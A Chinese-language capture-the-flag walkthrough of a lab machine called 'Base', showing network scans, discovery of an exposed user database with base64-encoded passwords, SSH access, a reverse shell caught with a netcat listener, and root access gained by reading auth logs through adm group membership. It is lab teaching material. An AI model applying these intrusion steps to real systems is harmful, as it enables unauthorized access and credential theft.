Base

靶机说明

QQ群:660930334

一、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap -sn 192.168.2.0/24     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:20 CST
Nmap scan report for 192.168.2.1
Host is up (0.00097s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00057s latency).
MAC Address: 08:00:27:09:B1:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.62
Host is up (0.00065s latency).
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds

靶机IP:192.168.2.62

二、端口扫描

1、全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.62                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:21 CST
Nmap scan report for 192.168.2.62
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds

开放端口:22,80

2、详细信息扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[/miao/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.62 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-23 14:22 CST
Nmap scan report for 192.168.2.62
Host is up (0.00096s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-generator: PivotX
|_http-title:         PivotX Powered    
| http-robots.txt: 1 disallowed entry 
|_/pivotx/
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:8D:84:B2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds

80端口开启Apache服务,存在robots.txt文件,robots.txt里面包含路径pivotx

三、WEB渗透

访问80端口,是一个框架为PivotX的内容管理系统

访问robots.txt里面的路径pivotx,找到系统后台登录页面,需要账号和密码

1、目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# dirsearch -u "http://192.168.2.62"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miao/maze-sec/base/reports/http_192.168.2.62/_25-07-24_20-37-15.txt

Target: http://192.168.2.62/

[20:37:15] Starting: 
[20:37:18] 403 -  277B  - /.ht_wsr.txt
[20:37:18] 403 -  277B  - /.htaccess.bak1
[20:37:18] 403 -  277B  - /.htaccess.sample
[20:37:18] 403 -  277B  - /.htaccess.orig
[20:37:18] 403 -  277B  - /.htaccess.save
[20:37:18] 403 -  277B  - /.htaccess_extra
[20:37:18] 403 -  277B  - /.htaccess_orig
[20:37:18] 403 -  277B  - /.htaccessBAK
[20:37:18] 403 -  277B  - /.htaccess_sc
[20:37:18] 403 -  277B  - /.htaccessOLD
[20:37:18] 403 -  277B  - /.htaccessOLD2
[20:37:18] 403 -  277B  - /.htm
[20:37:18] 403 -  277B  - /.html
[20:37:18] 403 -  277B  - /.htpasswd_test
[20:37:18] 403 -  277B  - /.htpasswds
[20:37:18] 403 -  277B  - /.httr-oauth
[20:37:19] 403 -  277B  - /.php
[20:37:50] 301 -  313B  - /images  ->  http://192.168.2.62/images/
[20:37:50] 200 -  175B  - /images/
[20:37:54] 200 -    5KB - /LICENSE.txt
[20:38:09] 200 -  311B  - /README.md
[20:38:11] 200 -   33B  - /robots.txt
[20:38:12] 403 -  277B  - /server-status
[20:38:12] 403 -  277B  - /server-status/
[20:38:22] 200 -  487B  - /UPGRADE.txt
[20:38:23] 200 -   12KB - /users.db

Task Completed

找到一个user.db

2、Sqlite3

下载后,查看文件类型,发现是一个sqlite3数据库

1
2
3
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# file users.db                                                           
users.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 2, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 2

查询得到用户名和密码hungry|aHVuZ3J5

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# sqlite3 users.db                                            
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .table
users
sqlite> select * from users;
1|hungry|aHVuZ3J5

尝试登录发现不对,尝试base64解码,得到密码hungry,尝试登录发现还是无法进行访问

1
2
3
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "aHVuZ3J5" | base64 -d                           
hungry

四、获取hungry权限

尝试登录SSH,最后成功以hungry:aHVuZ3J5进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# ssh hungry@192.168.2.62
hungry@192.168.2.62's password: 
Linux Base 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 ____                 
| __ )  __ _ ___  ___ 
|  _ \ / _` / __|/ _ \
| |_) | (_| \__ \  __/
|____/ \__,_|___/\___|

USER FLAG

1
2
hungry@Base:~$ cat user.txt 
flag{user-051a0db9a92e4dacc70212da32fd0638}

五、权限提升

1、获取www-data权限

查看/var/www/html/目录,发现存在文件creds.txt,查看找到两个账号密码

1
2
3
hungry@Base:/var/www/html$ cat creds.txt 
guest:guest
admin:YWRtaW*=

尝试登录admin发现密码错误,解密发现也错误

1
2
3
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "YWRtaW*=" | base64 -d                           
admibase64: 无效的输入

尝试加密admin,发现很相同

1
2
3
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# echo "admin" | base64      
YWRtaW4K

最后猜测,以admin:YWRtaW4K=成功进行后台

进行反弹shell

成功获取shell

1
2
3
4
5
6
┌──(root㉿kali)-[/miao/maze-sec/base]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.62] 33690
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),4(adm)

2、获取root权限

查看www-dataid,发现属于adm组

1
adm用户组是Linux系统中一个特殊的用户组。此组的成员通常具有读取和写入系统日志文件、查看系统性能指标以及执行其他系统管理任务的权限。如果当前用户隶属于adm用户组,那么就可以通过查看存储 在/var/log/目录下的系统敏感日志来辅助提权。

查看/var/log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
www-data@Base:/$ ls -la /var/log
total 2144
drwxr-xr-x  10 root root              4096 Jul 24 08:15 .
drwxr-xr-x  12 root root              4096 Apr  1 10:05 ..
-rw-r--r--   1 root root               302 Jul 20 00:12 alternatives.log
-rw-r--r--   1 root root             11791 Apr 11 22:03 alternatives.log.1
-rw-r--r--   1 root root              1658 Mar 31 04:15 alternatives.log.2.gz
drwxr-x---   2 root adm               4096 Jul 24 08:15 apache2
drwxr-xr-x   2 root root              4096 Jul 20 00:30 apt
-rw-r-----   1 root adm               9394 Jul 24 09:09 auth.log
-rw-rw----   1 root utmp                 0 Jul 19 23:58 btmp
-rw-rw----   1 root utmp              2688 Apr 11 21:48 btmp.1
-rw-r-----   1 root adm              53236 Jul 24 09:09 daemon.log
-rw-r-----   1 root adm                970 Jul 20 00:00 daemon.log.1
-rw-r-----   1 root adm               9582 Jul 19 23:58 daemon.log.2.gz
-rw-r-----   1 root adm              50014 Apr 11 21:37 daemon.log.3.gz
-rw-r-----   1 root adm              25197 Jul 24 08:15 debug
-rw-r-----   1 root adm              48236 Jul 19 23:58 debug.1
-rw-r-----   1 root adm              13708 Apr 11 21:37 debug.2.gz
-rw-r--r--   1 root root              2501 Jul 20 00:30 dpkg.log
-rw-r--r--   1 root root            148321 Apr 11 22:03 dpkg.log.1
-rw-r--r--   1 root root             20031 Mar 31 04:52 dpkg.log.2.gz
-rw-r--r--   1 root root             32064 Jul 20 00:10 faillog
-rw-r--r--   1 root root              1388 Apr  4 22:04 fontconfig.log
-rw-r-----   1 irc  adm                  0 Mar 31 04:15 inspircd.log
drwxr-xr-x   3 root root              4096 Mar 18 20:40 installer
drwxr-xr-x   2 irc  irc               4096 Mar 31 03:47 ircd
drwxr-sr-x+  3 root systemd-journal   4096 Mar 18 21:17 journal
-rw-r-----   1 root adm             172491 Jul 24 08:15 kern.log
-rw-r-----   1 root adm             357384 Jul 19 23:58 kern.log.1
-rw-r-----   1 root adm             228576 Apr 11 21:37 kern.log.2.gz
-rw-rw-r--   1 root utmp            292584 Jul 24 08:46 lastlog
-rw-r-----   1 root adm             147516 Jul 24 08:15 messages
-rw-r-----   1 root adm                294 Jul 20 00:00 messages.1
-rw-r-----   1 root adm              78049 Jul 19 23:58 messages.2.gz
-rw-r-----   1 root adm             198715 Apr 11 21:37 messages.3.gz
drwx------   2 root root              4096 Mar 18 20:40 private
drwxr-xr-x   3 root root              4096 Mar 18 21:17 runit
-rw-r-----   1 root adm               7919 Jul 24 09:09 syslog
-rw-r-----   1 root adm              59110 Jul 24 08:15 syslog.1
-rw-r-----   1 root adm              39046 Jul 23 02:17 syslog.2.gz
-rw-r-----   1 root adm                565 Jul 20 00:00 syslog.3.gz
-rw-r-----   1 root adm             108099 Jul 19 23:58 syslog.4.gz
-rw-r-----   1 root adm              14763 Apr 11 21:37 syslog.5.gz
-rw-r-----   1 root adm              89768 Apr  5 07:48 syslog.6.gz
-rw-r-----   1 root adm              13851 Apr  4 06:34 syslog.7.gz
drwxr-x---   2 root adm               4096 Jul 19 23:58 unattended-upgrades
-rw-r-----   1 root adm                  0 Jul 19 23:58 user.log
-rw-r-----   1 root adm               1690 Apr 11 22:22 user.log.1
-rw-rw-r--   1 root utmp            111360 Jul 24 08:46 wtmp

发现一个auth.log日志,查看

1
2
3
4
5
6
7
8
9
10
www-data@Base:/$ cat /var/log/auth.log
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event3 (Power Button)
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event4 (Sleep Button)
Jul 19 23:58:13 moban systemd-logind[332]: Watching system buttons on /dev/input/event0 (AT Translated Set 2 keyboard)
Jul 19 23:58:13 moban systemd-logind[332]: New seat seat0.
Jul 19 23:58:13 moban sshd[374]: Server listening on 0.0.0.0 port 22.
Jul 19 23:58:13 moban sshd[374]: Server listening on :: port 22.
Jul 19 23:59:05 moban passwd[528]: pam_unix(passwd:chauthtok): password changed for root
Jul 19 23:58:27 moban sudo[381]: root : password changed to 'dG9kZA==
......

发现root密码被修改成dG9kZA==,切换用户,成功登录

1
2
3
4
5
6
7
8
9
10
www-data@Base:/$ su root
Password: 
 ____                 
| __ )  __ _ ___  ___ 
|  _ \ / _` / __|/ _ \
| |_) | (_| \__ \  __/
|____/ \__,_|___/\___|
                      
root@Base:/# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

1
2
root@Base:/# cat root/root.txt 
flag{root}

【总结】

1、pivotx漏洞

PivotX 3.0.0 RC3 - Remote Code Execution (RCE),需要管理员权限
https://www.exploit-db.com/exploits/52361

2、sqlite3

sqlite注入的一点总结-先知社区

3、adm用户组提权

adm用户组是Linux系统中一个特殊的用户组。此组的成员通常具有读取和写入系统日志文件、查看系统性能指标以及执行其他系统管理任务的权限。如果当前用户隶属于adm用户组,那么就可以通过查看存储 在/var/log/目录下的系统敏感日志来辅助提权。

查看日志文件夹中各个文件的所属组

1
ls -al /var/log
Maze-sec
#pivotx #sqlite3 #提权-adm组
Base
http://miao-sec.github.io/Maze-sec/Base/
作者
Miao
发布于
2025年7月24日
许可协议
BY-MIAO